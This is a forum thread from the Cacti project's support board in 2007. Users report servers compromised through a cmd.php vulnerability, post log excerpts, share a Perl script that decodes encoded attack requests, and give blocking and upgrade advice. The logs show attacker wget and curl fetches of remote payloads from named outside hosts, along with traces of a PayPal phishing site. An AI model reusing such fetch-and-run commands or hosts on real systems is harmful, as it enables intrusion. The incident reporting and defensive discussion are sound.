|
|
| Author |
Message |
dvl
Joined: 15 Nov 2006
Posts: 16
Location: Warrington, PA
|
|
| Back to top |
|
 |
lozzd
Joined: 08 Dec 2005
Posts: 30
|
 Posted: Sat Jan 13, 2007 7:13 pm Post subject: |
 |
|
Great, thanks dvl.
I guess it must have failed as I saw nothing at all unusual in my graphs.. I just happened to be nosying through my error logs and found it. I'm quite impressed really that my apache seems to be so locked down; I thought I'd done a poor attempt at securing it, but I'd obviously done something right as everything was blocked! |
|
| Back to top |
|
|
scratchspace
Joined: 14 Jan 2007
Posts: 1
|
| Posted: Sun Jan 14, 2007 5:36 pm Post subject: |
|
|
Being as how we'd all like to know what it is these guys did to machines that were compromised, I wrote a script to decode the commands sent to the server. Fortunately, it appears these guys aren't taking all the steps to cover their tracks. One individual was clever enough to email himself. Enjoy.
Chris
| Code: |
#!/usr/bin/perl
# Point to the log file
open (FILE, "/var/log/httpd/access_log");
while (<FILE>) {
chomp;
# Request for /cacti
if (/cacti/) {
# Split the logfile. $line[6] should be the actual request if using common logfile format
@line = split (/ /, $_);
$request = $line[6];
# print "Request: ", $request, "\n";
# Chopping these up is kinda ugly....
@items = split (/,/, $request);
foreach $item (@items) {
# Look for CHAR, grab the first decimal number, start decoding the rest.
if ($item =~ /CHAR\(((\d+|\d))/) {
# print $item, "\n";
print chr($1);
$decode = 1;
}
# Look for close paren, grab the last decimal number, stop decoding.
if ($item =~ /(^(\d+|\d)\))/) {
#print $item, "\n";
print chr($1), "\n";
undef $decode;
}
# Decode the middle decimal numbers
if ($decode) {
print chr($item);
}
}
}
} |
|
|
| Back to top |
|
|
dagonet
Cacti User
Joined: 29 Oct 2005
Posts: 76
Location: Wuerzburg
|
| Posted: Mon Jan 15, 2007 5:36 am Post subject: |
|
|
Hello Community,
we should also consider the use of modsecurity http://www.modsecurity.org for apache installations.
I installed this module. So, now if you want to do a request for example on the cmd.php you will get the 403 response code.
For IIS installations is quit easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install
You can do it from the management console of the IIS.
Dagonet |
|
| Back to top |
|
|
raX
Lead Developer
Joined: 13 Oct 2001
Posts: 2237
Location: Carlisle, PA
|
| Posted: Wed Jan 17, 2007 10:37 pm Post subject: |
|
|
In addition to the official patches for this vulnerability, Cacti version 0.8.6j has just been released.
http://www.cacti.net/release_notes_0_8_6j.php
Be sure to upgrade ASAP!
-Ian |
|
| Back to top |
|
|
Mehuge
Joined: 23 Feb 2006
Posts: 4
|
| Posted: Fri Feb 02, 2007 2:25 pm Post subject: |
|
|
Humm...
I just did yum update and got 0.8.6i then noticed in this post that 0.8.6j was out, so downloaded and upated using rpm -U cacti-0.8.6j.fc4.i386.rpm
It made me go through the install process again, remembered all my graphs and data sources etc but has lost all historical data.
Is this normal? Is it possible to recover this data? Is it because I upgraded two version without going through the install process in between?
I upgraded (and am in this thread) because my server was compromised via this exploit. Extracts from my logs of the various hack attempts for your reference:-
| access_log wrote: | 80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 303
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /cmd.php HTTP/1.1" 404 285
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /cacti/cmd.php HTTP/1.1" 200 92
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /portal/cacti/cmd.php HTTP/1.1" 404 298
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /portal/cmd.php HTTP/1.1" 404 292
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /stats/cmd.php HTTP/1.1" 404 291 |
| error_log wrote: | [client 80.48.30.10] PHP Notice: Undefined index: 1 in /var/lib/cacti/lib/functions.php on line 511
[client 80.48.30.10] PHP Notice: Undefined index: total_polls in /var/lib/cacti/lib/functions.php on line 511
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 512
[client 80.48.30.10] PHP Notice: Undefined index: snmp_community in /var/lib/cacti/lib/functions.php on line 523
[client 80.48.30.10] PHP Notice: Undefined index: max_time in /var/lib/cacti/lib/functions.php on line 536
[client 80.48.30.10] PHP Notice: Undefined index: min_time in /var/lib/cacti/lib/functions.php on line 540
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 544
[client 80.48.30.10] PHP Notice: Undefined index: avg_time in /var/lib/cacti/lib/functions.php on line 545
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 545
[client 80.48.30.10] PHP Notice: Undefined index: status in /var/lib/cacti/lib/functions.php on line 548
[client 80.48.30.10] PHP Notice: Undefined index: status in /var/lib/cacti/lib/functions.php on line 548
[client 80.48.30.10] PHP Notice: Undefined index: status_fail_date in /var/lib/cacti/lib/functions.php on line 624
[client 80.48.30.10] PHP Notice: Undefined index: status_rec_date in /var/lib/cacti/lib/functions.php on line 625
[client 80.48.30.10] PHP Notice: Undefined index: status_last_error in /var/lib/cacti/lib/functions.php on line 626
[client 80.48.30.10] PHP Notice: Undefined index: min_time in /var/lib/cacti/lib/functions.php on line 627
[client 80.48.30.10] PHP Notice: Undefined index: max_time in /var/lib/cacti/lib/functions.php on line 628
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 632
[client 80.48.30.10] PHP Notice: Undefined index: hostname in /var/lib/cacti/lib/functions.php on line 634
--15:22:38-- http://881107.com/ping.txt
=> `ping.txt'
Resolving 881107.com... 221.251.37.64
Connecting to 881107.com|221.251.37.64|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied
Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory |
Another more detemined attempt was made today using the same exploit but failed again. |
|
| Back to top |
|
|
gandalf
Developer
Joined: 02 Dec 2004
Posts: 17009
Location: Muenster, Germany
|
| Posted: Fri Feb 02, 2007 5:26 pm Post subject: |
|
|
When upgrading, make sure to apply latest patches from main cacti site
Reinhard |
|
| Back to top |
|
|
wolf905
Joined: 03 Feb 2007
Posts: 1
|
| Posted: Sun Feb 04, 2007 12:05 am Post subject: Exploits in the Wild |
|
|
All,
Please excuse me if this is all old news.
I have had cacti lurking in the background on my web server for some time. Being that the machine is a personal web/e-mail server, it doesn't get a lot of attention.
This morning, I discovered my inbox full of errors from the cron daemon. It appears someone was using the cacti exploit to gain access to my system.
This was a non-trivial attack. Even though apache ran in its own userid, the attacker used a kernel exploit (I was running an older linux kernel version, 2.6.17) to gain root access. The attacker successfully replaced my sshd with a trojan, which copied login/passwords to a file in /usr/include/gpm3.h. Also, there was no trace of the commands he ran through the web server. All that I had in the logs were a whole lot of "Connection Refused" errors, and this:
| Code: | --22:09:42-- http://207.58.141.211/~gr/ping
=> `ping'
Connecting to 207.58.141.211:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 629 [text/plain]
ping: Permission denied
Cannot write to `ping' (Permission denied).
mv: cannot stat `ping': No such file or directory
Can't open perl script "temp2006": No such file or directory
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M100 629 100 629 0 0 6685 0 --:--:-- --:--:-- --:--:-- 6685
curl: (23) Failed writing body
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M100 629 100 629 0 0 6701 0 --:--:-- --:--:-- --:--:-- 6701^M100 629 100 629 0 0 6688 0 --:-
-:-- --:--:-- --:--:-- 0
Error: Connection refused |
What the attacker failed to do was log into my system. The sshd they installed broke my sshd configuration (I have a slightly unusual setup), and they were thereafter unable to log in. He did a decent job of covering his tracks, and deleted my cacti.log, but left enough of a trail for me to identify what he was doing. Regardless, this idiot caused my system to reload, broke in far enough to warrant re-imaging (upgrading to FC6), and ticked me off. 
A previous attacker attempted to gain access to my system on the 25th of Jan, but was unable to break out of the apache user account. This attackers attempts were fairly well documented in the log files as a series of attempts to use the basic milw0rm.com exploit.
Just thought I'd document my findings, and let people know that this is being actively exploited in the wild. If you have any system holes (like my kernel privilege escalation vulnerability), this cacti vulnerability could be big trouble.
Good luck,
WLF |
|
| Back to top |
|
|
kaptk2
Joined: 16 Feb 2005
Posts: 14
Location: Western United States
|
| Posted: Sun Feb 11, 2007 2:01 am Post subject: |
|
|
| What is the best way to recover from this attack? Can anybody offer hints on what to do to clean up a compromised system? |
|
| Back to top |
|
|
rony
Developer/Forum Admin
Joined: 17 Nov 2003
Posts: 5694
Location: Michigan, USA
|
| Posted: Sun Feb 11, 2007 12:21 pm Post subject: |
|
|
If you even suspect a compermise, I would suggest a system reload.
You can backup and restore your cacti installation, not the whole server. |
|
| Back to top |
|
|
shahzadmasih
Joined: 28 Feb 2007
Posts: 1
Location: UK
|
| Posted: Wed Feb 28, 2007 9:24 am Post subject: |
|
|
| Hi, This post is very informative, however I would like some specific information. If someone can help me then please send me a private message. Best Regards, |
|
| Back to top |
|
|
rony
Developer/Forum Admin
Joined: 17 Nov 2003
Posts: 5694
Location: Michigan, USA
|
| Posted: Wed Feb 28, 2007 9:46 am Post subject: |
|
|
| shahzadmasih wrote: | | Hi, This post is very informative, however I would like some specific information. If someone can help me then please send me a private message. Best Regards, |
What would you like more information on? |
|
| Back to top |
|
|
JJX
Cacti User
Joined: 06 Oct 2005
Posts: 196
|
| Posted: Wed Apr 04, 2007 1:05 pm Post subject: |
|
|
| dagonet wrote: | Hello Community,
we should also consider the use of modsecurity http://www.modsecurity.org for apache installations.
I installed this module. So, now if you want to do a request for example on the cmd.php you will get the 403 response code.
For IIS installations is quit easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install
You can do it from the management console of the IIS.
Dagonet |
is possible to share with up the configuration of mod_security that affect cacti? |
|
| Back to top |
|
|
mooreds
Joined: 06 Apr 2007
Posts: 1
Location: Boulder, CO
|
| Posted: Fri Apr 06, 2007 12:53 pm Post subject: |
|
|
| dagonet wrote: | Hello Community,
we should also consider the use of modsecurity http://www.modsecurity.org for apache installations.
I installed this module. So, now if you want to do a request for example on the cmd.php you will get the 403 response code.
For IIS installations is quit easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install
You can do it from the management console of the IIS.
Dagonet |
You can block access to cacti files and directories with Apache as well, and I don't know if you need mod_security. Inside your virtual server or document root, put entries like this:
| Code: |
<Files cmd.php>
Order allow,deny
Deny from all
</Files>
<Directory /usr/local/cacti-0.8.6j/log>
Order allow,deny
Deny from all
</Directory>
|
See http://httpd.apache.org/docs/1.3/mod/core.html#directory and http://httpd.apache.org/docs/1.3/mod/core.html#files for more. |
|
| Back to top |
|
|
JustJoe
Joined: 24 Mar 2005
Posts: 10
|
| Posted: Sun Jun 10, 2007 3:51 pm Post subject: |
|
|
Ofcourse this vulnerability is solved now, but i just wanted to let people know its ABSOLUTELY VITAL to UPDATE. I just found out the hard way: I was hacked. Big time. They managed to put a Paypal phishing site on my home webby using this vulnerability.
A few days ago i got a call from my isp informing me they had shutdown my internet connection because they received notice from Verisign that a fraudulent website was active on my IP. I fell out of my chair. Seriously.
Going through Apache logs i found when they hacked in. Only 15 hours after they got in the phishing started. The log shows countless GET's on url's like | Code: | /cacti/rra/www.paypal.fr/cgi-bin/webscr/
SignIn&co_partnerId=2&pUserId=&siteid=0&pageType=&pa1/
Update-profile-notify/index.html |
They must have send out e-mails to lots of paypal.fr clients persuading them to 'reactivate their account'. I found this picture of what it must've looked like.
The phishing lasted for 4 days. Now my isp has disconnected me during the investigation. I'm quite confident i'll be proven innocent and get my internet connection back next week. So no real harm done to me but i don't know how many people fell for this shit and gave the criminals their Paypal login and/or CC credentials....
So, the moral of the story, as said before:
ALWAYS KEEP YOUR SOFTWARE UP-TO-DATE ! |
|
| Back to top |
|
|
|
FAQ
Search
Memberlist
Register
Profile
Log in to check your private messages
Log in
